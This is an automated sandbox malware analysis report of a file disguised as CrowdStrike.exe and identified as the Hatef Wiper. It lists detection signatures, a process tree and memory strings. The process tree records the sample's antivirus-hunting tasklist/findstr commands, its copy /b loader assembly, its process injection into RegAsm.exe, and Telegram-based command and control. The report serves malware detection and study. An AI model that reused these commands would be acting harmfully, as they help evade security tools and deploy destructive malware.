Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
CrowdStrike.exe

Overview

General Information

Sample name:CrowdStrike.exe
Analysis ID:1477426
MD5:755c0350038daefb29b888b6f8739e81
SHA1:5b2f56953b3c925693386cae5974251479f03928
SHA256:4491901eff338ab52c85a77a3fbd3ce80fda738046ee3b7da7be468da5b331a3
Tags:exe
Infos:

Detection

Hatef Wiper
Score:96
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Sigma detected: Search for Antivirus process
Yara detected Hatef Wiper
AI detected suspicious sample
Drops PE files with a suspicious file extension
Found stalling execution ending in API Sleep call
Injects a PE file into a foreign processes
Sample is not signed and drops a device driver
Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper Arguments
Uses the Telegram API (likely for C&C communication)
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality for read data from the clipboard
Contains functionality to dynamically determine API calls
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates driver files
Deletes files inside the Windows folder
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Potentially Suspicious Execution Of Regasm/Regsvcs From Uncommon Location
Sigma detected: Suspicious Copy From or To System Directory
Uses 32bit PE files

Classification

Process Tree

  • System is w10x64
  • CrowdStrike.exe (PID: 7312 cmdline: "C:\Users\user\Desktop\CrowdStrike.exe" MD5: 755C0350038DAEFB29B888B6F8739E81)
    • cmd.exe (PID: 7384 cmdline: "C:\Windows\System32\cmd.exe" /k copy Carroll Carroll.cmd & Carroll.cmd & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7392 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • tasklist.exe (PID: 7432 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 7440 cmdline: findstr /I "wrsa.exe opssvc.exe" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • tasklist.exe (PID: 7484 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 7492 cmdline: findstr /I "avastui.exe avgui.exe bdservicehost.exe nswscsvc.exe sophoshealth.exe" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 7532 cmdline: cmd /c md 564784 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • findstr.exe (PID: 7544 cmdline: findstr /V "locatedflatrendsoperating" Ukraine MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 7556 cmdline: cmd /c copy /b Treating + Viagra + Vision + Jul + Str 564784\L MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Champion.pif (PID: 7572 cmdline: 564784\Champion.pif 564784\L MD5: 6EE7DDEBFF0A2B78C7AC30F6E00D1D11)
        • RegAsm.exe (PID: 7904 cmdline: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe MD5: 0D5DF43AF2916F47D00C1573797C1A13)
      • timeout.exe (PID: 7588 cmdline: timeout 15 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000F.00000002.3703692097.0000000000702000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_HatefWiperYara detected Hatef WiperJoe Security
    Process Memory Space: RegAsm.exe PID: 7904JoeSecurity_HatefWiperYara detected Hatef WiperJoe Security

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      15.2.RegAsm.exe.700000.2.unpackJoeSecurity_HatefWiperYara detected Hatef WiperJoe Security

        Sigma Signatures

        System Summary

        barindex
        Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper Arguments
        Source: Process startedAuthor: Oleg Kolesnikov @securonix invrep_de, oscd.community, Florian Roth (Nextron Systems), Christian Burkard (Nextron Systems): Data: Command: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe, CommandLine: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe, ParentCommandLine: 564784\Champion.pif 564784\L, ParentImage: C:\Users\user\AppData\Local\Temp\564784\Champion.pif, ParentProcessId: 7572, ParentProcessName: Champion.pif, ProcessCommandLine: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe, ProcessId: 7904, ProcessName: RegAsm.exe
        Sigma detected: Execution of Suspicious File Type Extension
        Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: 564784\Champion.pif 564784\L, CommandLine: 564784\Champion.pif 564784\L, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\564784\Champion.pif, NewProcessName: C:\Users\user\AppData\Local\Temp\564784\Champion.pif, OriginalFileName: C:\Users\user\AppData\Local\Temp\564784\Champion.pif, ParentCommandLine: "C:\Windows\System32\cmd.exe" /k copy Carroll Carroll.cmd & Carroll.cmd & exit, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7384, ParentProcessName: cmd.exe, ProcessCommandLine: 564784\Champion.pif 564784\L, ProcessId: 7572, ProcessName: Champion.pif
        Sigma detected: Potentially Suspicious Execution Of Regasm/Regsvcs From Uncommon Location
        Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe, CommandLine: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe, ParentCommandLine: 564784\Champion.pif 564784\L, ParentImage: C:\Users\user\AppData\Local\Temp\564784\Champion.pif, ParentProcessId: 7572, ParentProcessName: Champion.pif, ProcessCommandLine: C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe, ProcessId: 7904, ProcessName: RegAsm.exe
        Sigma detected: Suspicious Copy From or To System Directory
        Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /k copy Carroll Carroll.cmd & Carroll.cmd & exit, CommandLine: "C:\Windows\System32\cmd.exe" /k copy Carroll Carroll.cmd & Carroll.cmd & exit, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\CrowdStrike.exe", ParentImage: C:\Users\user\Desktop\CrowdStrike.exe, ParentProcessId: 7312, ParentProcessName: CrowdStrike.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /k copy Carroll Carroll.cmd & Carroll.cmd & exit, ProcessId: 7384, ProcessName: cmd.exe

        HIPS / PFW / Operating System Protection Evasion

        barindex
        Sigma detected: Search for Antivirus process
        Source: Process startedAuthor: Joe Security: Data: Command: findstr /I "avastui.exe avgui.exe bdservicehost.exe nswscsvc.exe sophoshealth.exe" , CommandLine: findstr /I "avastui.exe avgui.exe bdservicehost.exe nswscsvc.exe sophoshealth.exe" , CommandLine|base64offset|contains: ~), Image: C:\Windows\SysWOW64\findstr.exe, NewProcessName: C:\Windows\SysWOW64\findstr.exe, OriginalFileName: C:\Windows\SysWOW64\findstr.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /k copy Carroll Carroll.cmd & Carroll.cmd & exit, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7384, ParentProcessName: cmd.exe, ProcessCommandLine: findstr /I "avastui.exe avgui.exe bdservicehost.exe nswscsvc.exe sophoshealth.exe" , ProcessId: 7492, ProcessName: findstr.exe

        Snort Signatures

        No Snort rule has matched

        Joe Sandbox Signatures

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Multi AV Scanner detection for submitted file
        Source: CrowdStrike.exeVirustotal: Detection: 20%Perma Link
        Source: CrowdStrike.exeReversingLabs: Detection: 15%
        AI detected suspicious sample
        Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.5% probability
        Source: CrowdStrike.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
        Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49739 version: TLS 1.2
        Source: CrowdStrike.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: RegAsm.exe, 0000000F.00000002.3718011977.00000000077E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: RegAsm.exe, 0000000F.00000002.3732977075.0000000008AA1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: t:\naveen\pgms\cpp\openfilefinder_src_vc8\listfiledrv\objfre_wxp_x86\i386\ListOpenedFileDrv.pdb` source: RegAsm.exe, 0000000F.00000002.3703692097.0000000000702000.00000040.00000400.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb source: RegAsm.exe, 0000000F.00000002.3816270828.000000000BE11000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: RegAsm.exe, 0000000F.00000002.3866776503.000000000D811000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb source: RegAsm.exe, 0000000F.00000002.3816270828.000000000C811000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: RegAsm.exe, 0000000F.00000002.3753665442.0000000009E11000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: $^qyC:\Documents and Settings\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: RegAsm.exe, 0000000F.00000002.3753665442.0000000009E11000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: RegAsm.exe, 0000000F.00000002.3816270828.000000000C811000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: G:\Gaza Hackers Team\Handala WP\SecureDeleteFilesConsole\obj\Debug\SecureDeleteFilesConsole.pdb source: RegAsm.exe, 0000000F.00000002.3703692097.00000000007D9000.00000040.00000400.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: RegAsm.exe, 0000000F.00000002.3705258200.00000000030E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: RegAsm.exe, 0000000F.00000002.3753665442.0000000009E11000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: RegAsm.exe, 0000000F.00000002.3732977075.00000000094A1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb source: RegAsm.exe, 0000000F.00000002.3705258200.00000000030E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: $^qiC:\Documents and Settings\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: RegAsm.exe, 0000000F.00000002.3732977075.0000000008AA1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb source: RegAsm.exe, 0000000F.00000002.3732977075.00000000094A1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: RegAsm.exe, 0000000F.00000002.3718011977.00000000077E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb source: RegAsm.exe, 0000000F.00000002.3732977075.0000000008AA1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: RegAsm.exe, 0000000F.00000002.3718011977.00000000081E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb source: RegAsm.exe, 0000000F.00000002.3718011977.00000000077E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb source: RegAsm.exe, 0000000F.00000002.3816270828.000000000BE11000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: $^qmC:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Temp\Symbols\winload_prod.pdb source: RegAsm.exe, 0000000F.00000002.3718011977.00000000081E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: RegAsm.exe, 0000000F.00000002.3866776503.000000000D811000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: RegAsm.exe, 0000000F.00000002.3816270828.000000000C811000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: RegAsm.exe, 0000000F.00000002.3816270828.000000000BE11000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: $^qnC:\Documents and Settings\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: RegAsm.exe, 0000000F.00000002.3753665442.0000000009E11000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: RegAsm.exe, 0000000F.00000002.3753665442.0000000009E11000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb source: RegAsm.exe, 0000000F.00000002.3753665442.0000000009E11000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb source: RegAsm.exe, 0000000F.00000002.3718011977.00000000077E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb source: RegAsm.exe, 0000000F.00000002.3816270828.000000000BE11000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: RegAsm.exe, 0000000F.00000002.3866776503.000000000D811000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb source: RegAsm.exe, 0000000F.00000002.3816270828.000000000BE11000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: RegAsm.exe, 0000000F.00000002.3732977075.00000000094A1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: RegAsm.exe, 0000000F.00000002.3732977075.0000000008AA1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb source: RegAsm.exe, 0000000F.00000002.3718011977.00000000077E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: RegAsm.exe, 0000000F.00000002.3718011977.00000000077E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb source: RegAsm.exe, 0000000F.00000002.3732977075.0000000008AA1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: RegAsm.exe, 0000000F.00000002.3753665442.0000000009E11000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: $^qjC:\Documents and Settings\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: RegAsm.exe, 0000000F.00000002.3753665442.0000000009E11000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: RegAsm.exe, 0000000F.00000002.3718011977.00000000077E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: RegAsm.exe, 0000000F.00000002.3718011977.00000000077E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: RegAsm.exe, 0000000F.00000002.3718011977.00000000077E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: RegAsm.exe, 0000000F.00000002.3753665442.0000000009E11000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: RegAsm.exe, 0000000F.00000002.3732977075.0000000008AA1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb source: RegAsm.exe, 0000000F.00000002.3866776503.000000000D811000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: $^qiC:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb source: RegAsm.exe, 0000000F.00000002.3718011977.00000000081E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: RegAsm.exe, 0000000F.00000002.3718011977.00000000077E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: RegAsm.exe, 0000000F.00000002.3753665442.0000000009E11000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: RegAsm.exe, 0000000F.00000002.3753665442.0000000009E11000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: RegAsm.exe, 0000000F.00000002.3718011977.00000000077E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: RegAsm.exe, 0000000F.00000002.3732977075.00000000094A1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb source: RegAsm.exe, 0000000F.00000002.3718011977.00000000077E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: RegAsm.exe, 0000000F.00000002.3816270828.000000000BE11000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb source: RegAsm.exe, 0000000F.00000002.3705258200.00000000030E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb source: RegAsm.exe, 0000000F.00000002.3866776503.000000000D811000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb source: RegAsm.exe, 0000000F.00000002.3718011977.00000000077E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: t:\naveen\pgms\cpp\openfilefinder_src_vc8\listfiledrv\objfre_wxp_x86\i386\ListOpenedFileDrv.pdb source: RegAsm.exe, 0000000F.00000002.3703692097.0000000000702000.00000040.00000400.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: RegAsm.exe, 0000000F.00000002.3718011977.00000000077E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: $^q~C:\Documents and Settings\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: RegAsm.exe, 0000000F.00000002.3732977075.0000000008AA1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: RegAsm.exe, 0000000F.00000002.3718011977.00000000081E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb source: RegAsm.exe, 0000000F.00000002.3816270828.000000000BE11000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: RegAsm.exe, 0000000F.00000002.3816270828.000000000BE11000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: RegAsm.exe, 0000000F.00000002.3866776503.000000000D811000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: RegAsm.exe, 0000000F.00000002.3816270828.000000000BE11000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: RegAsm.exe, 0000000F.00000002.3753665442.0000000009E11000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: RegAsm.exe, 0000000F.00000002.3718011977.00000000077E1000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb source: RegAsm.exe, 0000000F.00000002.3753665442.0000000009E11000.00000004.00000800.00020000.00000000.sdmp
